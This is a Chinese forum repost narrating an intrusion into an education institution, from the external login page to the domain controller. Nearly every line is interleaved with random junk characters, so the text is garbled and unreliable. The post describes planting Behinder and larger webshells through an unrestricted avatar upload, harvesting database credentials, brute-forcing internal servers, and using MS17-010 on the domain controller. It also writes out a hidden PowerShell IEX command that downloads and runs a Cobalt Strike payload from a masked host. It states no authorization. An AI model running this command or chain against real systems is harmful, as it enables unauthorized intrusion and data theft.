找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2032|回复: 0

渗透实战 | 从外网直接打到内网全过程

[复制链接]
发表于 2024-3-1 19:41:32 | 显示全部楼层 |阅读模式

- f7 y* T/ E7 s: B: j0 S! A 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 ( }( Q, k, S W% O9 X

0 Y$ h1 F( t; }

" [% d( \: ^2 f# \; ~4 Q+ D4 q   4 D) [ l, f2 Z& q7 t I

; K) g: x8 U: `8 e

1 f8 t0 U; u: S: _5 [$ ]- m 正文 + d( H1 F9 n0 ~" W6 a& e

+ q5 V6 E( a. Y: A$ K7 R1 F9 I

9 _* @! [, j: f' {   ( W% s. v+ S9 K

% |$ j# O1 ] X: M9 j, `

7 R' i. y4 i0 W. g5 b4 B 目标:www.xxxx.com(一家教育机构)
$ W2 r$ g" p) x2 l
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
8 g- g; O/ ^* f( ]* \

' r' k* q2 {0 Q

: D7 q/ G6 W0 S8 ] vshapes= $ O; a+ J, P8 `1 Z9 V

' K# }' \6 G8 ~. Q+ q1 P& i. X1 w" g, O

& D) S9 s4 G' z) V3 C" v4 X$ X1 V 进行了简单的信息搜集
: j. k8 {. O2 U2 S, O+ d2 @0 m
! H2 u) G4 d7 p4 Y% D9 j
& x0 S3 e& N7 ^1 Z% {

6 ?" B& C) R. {9 }: m' v

# x2 a# }6 g8 e. A0 J2 _8 v* j: l 子域名搜集 + ~' y; f- l/ R) G5 J

, |( O5 D! V7 H# L: I1 `# Z4 x

/ b, B7 N& j$ b vshapes= 1 Y$ |7 u. W# ^. m6 E- V

9 F3 U2 @" P3 Y& @8 V+ E7 |

4 J2 n7 I2 p& a: B; \ fofa找资产
$ G9 H+ A3 U5 j& K
2 k; |" e# @2 L2 a9 i
% [; `1 o" o5 Y5 y' W; \. r" c

8 G& P/ r: ^$ ]6 i

- W, s! E+ x* I& t0 h+ Z vshapes=: H2 o% a5 @% c% r3 u, _

; M' Q Y+ `! G

' p; ~7 {9 `4 w; ]- s1 `. X3 t 一共七个资产。去重之后只有两个。
2 P" U; C k+ k$ ]: c, [
: X4 e; `1 r T7 s# |% |% i- ^" N
6 N- ^8 Z5 j& k% j

, [ @7 A' m$ \* t4 x7 j+ [

" ^6 B# H) K3 j2 s 目录探测 / F7 w: r5 {# R; y

( q t5 B4 k. w2 v

; R3 g @- }* [; \; S5 r; M vshapes=5 q9 `7 C. E. {/ Y+ Y3 K

7 W" x! o. U$ B3 f

) S8 W( a- G7 F" A 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
9 h* E4 _2 Z: N$ `' l5 Z9 |0 w
3 v$ @; q# p% u- Q: T. f2 V
! b7 u5 ?( x0 t) M2 i5 R

5 O" w: G6 s6 D2 K$ u& B

7 `- ^2 y" R; W# E6 n 我又尝试了通过修改返回包来绕过登录界面% A; I/ {$ ~7 J' f- T- ^

6 z6 t9 G1 k. |6 k. G- A

/ s1 F1 a; Y1 K" O vshapes=: ~* v$ e! W2 }$ w S5 R

/ g* V: K2 @" e$ O0 U' [6 P

: ~% q6 _, M" e E. d( i0 \ 还是不行,尝试注入无果 3 u/ J1 S6 ~* J8 G) o1 ~) _' @

" s* ?5 M( ~, W7 y; a' D' K

( n: J; ?" H d$ K4 o vshapes= 4 Q: \( r4 c5 a" J! w/ j

8 L3 Z5 l& I3 q* X& W

6 H6 G! Z% f: C# @: u5 i: v0 S) n 不过我目录探测出了一处Spring信息泄露
% q- ]. t( h9 M7 A: _
, f5 j4 X! i4 Y3 [
% }* L2 d9 `8 T% b' e e

' r* |8 c: f+ u1 K. I

6 _2 ?% w% H Q vshapes=; A" R$ G* b: b

% u) `. |: u; |0 m5 s" p m$ p4 l1 O

- V5 b! F1 l, E! o 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录: _. f2 ^" E/ Q6 {

6 d) B/ D7 V3 _

; G2 _6 ^ A7 {6 Y$ B6 l N& h vshapes=4 h+ Y0 p! ^8 n

/ Y5 Z& E* W6 ~

+ z8 y- }' {. l5 W$ ? 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。: W$ a4 {5 z# c- o: `8 }' J" A8 o

: H% s. O, |1 C+ a4 `+ j2 B* U

+ f: Y+ q! o8 f, T4 {" A0 `, r& \ vshapes=9 c \5 k( f* a; R, A

. b9 [4 G" Q7 o5 i

; Z9 P% a# N- f; d! N: V 获取有些师傅到这一步就手机抓包电脑测了。 O1 m, r8 d# f: `1 F( p- O; k- Z( `

3 j9 R+ M, H+ D1 m" ]- X E4 p

( D R; X; X# F% N8 r4 u! Z Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。5 u* u% N) }: d" t) Y+ U; v

( }+ ]% r+ ]* u! s& ?: g- R

3 s( K1 D. p* q 其中在一个公众号发现了小程序,可以进行注册。- y0 F8 z, G% q8 X8 y" R

/ o$ ^& |/ i* I2 }: w

/ A+ G( B$ L8 G" ?) |6 n$ ] 看到了头像上传,尝试上传获取WebShell 5 M. z. Z( A5 Y" n6 P) x

8 p* P9 L/ Y. U; l2 }1 \

8 n( |$ F3 t L' Y' H vshapes=% U2 Y; W. U% p% e1 @6 {) W

5 O9 X; y" n, K3 H

+ _) ~. U& ^7 J, _, N2 D! a z+ ^ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 ' L8 _+ R' U$ s2 ^' y

! c% ]6 ]/ s7 W; B: a0 {, u# a

0 V4 H- T" T" Z% ^8 n vshapes= 2 e+ {$ e7 v7 w. ]& X! G3 [

. P2 t: C0 W" Z0 b# S

5 p- J* p' @; h, I; D# s) R 然后上了大马 & i T, p8 O6 }1 p. e

8 k& q) W# Z+ j. V3 @+ ]6 D

9 m0 n) k. u8 g' L vshapes=& ?1 n- p& P$ n! U' p

6 ~& f5 I# P* u

0 X0 T; M0 C9 @8 o7 N+ [# w1 O vshapes= X0 M9 N r6 ^" }; L

& V' R6 M' d' h& o* ]4 ]

& I; f4 H. Z& {- ^- E5 g# r 通过翻找文件发现数据库账号密码& _% u0 u2 |% J( b+ `0 _; ~

( M( D4 G# |- A8 s5 h5 x# Q

; N9 m% v% J9 g vshapes= 0 J* K6 A$ a1 T! f& k2 }

+ E6 ~, o: b3 q: i3 a

3 [. E& z1 ]- } t% G* g: |) R1 a --内网渗透* s: V B% i5 i( |7 u) Q/ I l) y

, }9 ~ Y: s' Y, k# i* |

- \2 v/ X8 u: t9 [' f 直接通过powershell执行 cs上线 3 i% \2 @. n" g! d' H- G; q. g( N3 u- @

2 j% j8 |" p' R2 i0 E8 A9 Y

; Z* Q6 ]/ D% T8 v powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 7 r( m2 Z" D$ d& w( z

& z& p& x1 U! }0 h- l0 H

3 @' A! Q5 L! Z7 B vshapes= ! W6 k9 x4 I* ^

( h) D( E, @6 Z. G. v4 b& i

/ X' o" X8 ~# T: y* E# [ 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 5 @5 N& S* \# ?& x

7 a7 V( |3 h$ s' \; m+ L

0 w4 e F3 `. ]- X% U- ^ vshapes=1 T6 M! U( A5 E* M5 G; V l

2 n0 u/ ]/ N5 L( T, j* ?

0 y. h- c, j- W2 x$ r! F/ l3 T 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
2 J, O2 F% b* I; n8 ]4 p& U/ j, P
% z% | n" s6 t# B o
6 i/ p+ L1 w, R, [
% i; C+ S; p. {( U# N6 ~3 l

6 V6 f. {0 i4 `8 Q8 C4 I

) J) B n" z0 P8 I( \ vshapes=( p3 \% R p7 T1 l; {

6 V9 a o( E$ y

% Y& ?6 o/ |' t 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
! k( ^- }; j6 [8 i+ f
& R# X9 ^2 |: z8 K
" t9 x! t# w, U" i

* A5 w' T$ f P! |3 Y

' v* V6 K( t; ~( B& j" \4 @4 E vshapes=- g- E, N! Z0 G; T& l% B

& m* R3 {. E5 [4 V

2 ?/ b' X& o! F( E
3 ^: h0 X. K9 D1 Q' p, J7 s
% Q6 G3 V! M( a0 N; N4 m- Q. Q
% d$ _/ a0 r# F5 S

$ D' k% V$ H% y) F# A

) P. ?0 `7 K; q/ b$ q* e  ; h1 X+ Z: G( w: L

8 f/ n4 v6 I) M1 u1 U6 h

) W" c# N+ o) f 小结" U6 r0 E, g9 ?" D/ t7 A

, q$ D8 }; o# [& U3 b5 V' K

5 |$ z3 R2 A' T# S9 N   & `( f8 D# ^$ z! d& g- A* l

1 u4 D8 ]3 r7 W8 m' c& h Q

. r4 P- }( L+ X2 D0 R" V' G9 ? 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! - M& P& b9 ]) ?& `, H' f, U2 y. G

0 J# Q [0 T* K% f

; C0 E- e$ {: [. G   0 l7 D4 {. o( I6 U- G$ T1 ]. Q

7 z. [9 E9 Y3 _2 j! C
    $ p; L8 f8 o1 U- O
  • + K1 P. Q9 Q3 ?  ; \! J3 u1 A0 F+ N7 k. e+ Y
  • ! u- Y8 k! {# H, ]' P* U% u j
  • ! ^0 D8 K$ A8 {) H- q/ v   ! {! J% ~9 ~: b6 D" c% O1 ]+ j8 ^
  • 3 r7 ~3 k3 y/ A2 I7 |
2 W2 \$ c/ f: a# ~/ e) s& z% e

. F a' |2 k3 ` 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html+ l" z2 D0 Z; F3 I6 v

8 {+ u) k" d2 ^) x" H; ]. c

: r7 }3 d. U$ v# V: u- Z% N# o0 ~  : j6 S. c$ Y# D4 B

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表